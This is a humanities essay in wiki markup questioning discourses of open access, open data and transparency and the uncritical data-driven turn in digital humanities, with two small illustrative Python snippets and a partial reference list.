&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy ‘Climategate’] controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists had tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency] – let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall, 2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall, 2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall, 2011a: 142). To paraphrase a question from Lyotard I am going to return to at greater length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hillary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama administration from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65 per cent of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines reach only an extremely small percentage of the total number of available web pages. Ten years ago, Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’, the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and the use of the password-protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so may of course be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just on their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented help to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010a; 2010b). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided (1986: 9)? Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? 
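&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To make this point about the productive (rather than neutral) character of metadata concrete, a deliberately minimal sketch may help. The following Python fragment is purely illustrative – the record, its field names and the ''visible'' function are all invented for the purpose, and correspond to no particular repository or cataloguing standard – but it shows how a query can only ever return what the metadata has already framed as findable: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;pre&amp;gt;
# Purely illustrative sketch: an invented record structure and field names,
# standing in for no particular metadata standard (Dublin Core, MARC, etc.).
record = {
    "title": "White Noise: On the Limits of Openness",
    "creator": "Hall, Gary",
    "date": "2010",
    "subject": ["open access", "open data", "metadata"],
}

def visible(records, field, value):
    """Return only the records whose metadata matches the query.
    Whatever was catalogued differently simply never surfaces."""
    return [r for r in records if value in r.get(field, [])]

catalogue = [record]
print(visible(catalogue, "subject", "open data"))  # found: [record]
print(visible(catalogue, "subject", "secrecy"))    # invisible: []
&amp;lt;/pre&amp;gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On this toy model, the decision to describe the record with the subject heading ‘open data’ rather than, say, ‘secrecy’ determines in advance which searches will ever retrieve it – a small instance of the way metadata produces, rather than reflects, what counts as data.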
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflexivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that explicitly emphasize the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgin], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referenced [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has ‘the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010). Three years ago, Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and, what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike Google) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories, many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of their work is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2010a)? 
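&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; It may help to make concrete just how simple the computation behind such a finding can be. The following Python sketch is purely illustrative – the handful of titles and dates are invented stand-ins, not the 1,681,161 digitized books Cohen and Gibbs actually mined – but the underlying operation, counting the titles per year that contain a given word, is of essentially this kind: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;pre&amp;gt;
# Illustrative sketch only: a toy corpus of (year, title) pairs standing
# in for the digitized Victorian books text-mined by Cohen and Gibbs.
from collections import Counter

titles = [
    (1848, "The Year of Revolution"),
    (1848, "Revolution and Reaction in Europe"),
    (1851, "A Natural History of British Birds"),
    (1859, "Notes on the Industrial Revolution"),
]

def spikes(corpus, word):
    """Count, per year, how many titles contain the given word."""
    counts = Counter()
    for year, title in corpus:
        if word in title.lower():
            counts[year] += 1
    return dict(sorted(counts.items()))

print(spikes(titles, "revolution"))  # {1848: 2, 1859: 1}
&amp;lt;/pre&amp;gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The question raised above is precisely whether scaling such counting up to millions of titles yields, by itself, an argument – or only a pattern awaiting one.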
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this ‘experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship, moreover, that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and mathematics) and withdrawing support and funding from the humanities? Or is all this happening now partly because the humanities, like the sciences themselves, are under pressure from government, business, management, industry and, increasingly, the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). 
To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information – so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, in order to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al. call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue: bored with thinking about it, they are enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26 million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information – and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). 
It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much-needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at Data Landscapes, an AHRC network event held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010].) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ‘Bifo’ Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol. 7, no. 1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011a), ‘&amp;quot;There’s Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics’, ''Cultural Politics'' 7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C. (2011b, forthcoming), ‘Transparency, Interrupted: Secrets of the Left’, ‘Between Transparency and Secrecy’ Annual Review, ''Theory, Culture and Society'', December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom’: the prepared text of U.S. Secretary of State Hillary Rodham Clinton’s speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010), ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. 
(2010), response to Tanner Higgin, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze, G. and Guattari, F. (1988), ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze, G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M. and Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010), ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008), ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’, ''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks’ release’, ''MSNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Informatics'', September 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Informatics'', September 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), ‘We Can Know It For You: The Secret Life of Metadata’, ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgin, T. (2010), ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009), ‘Open Access – What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. 
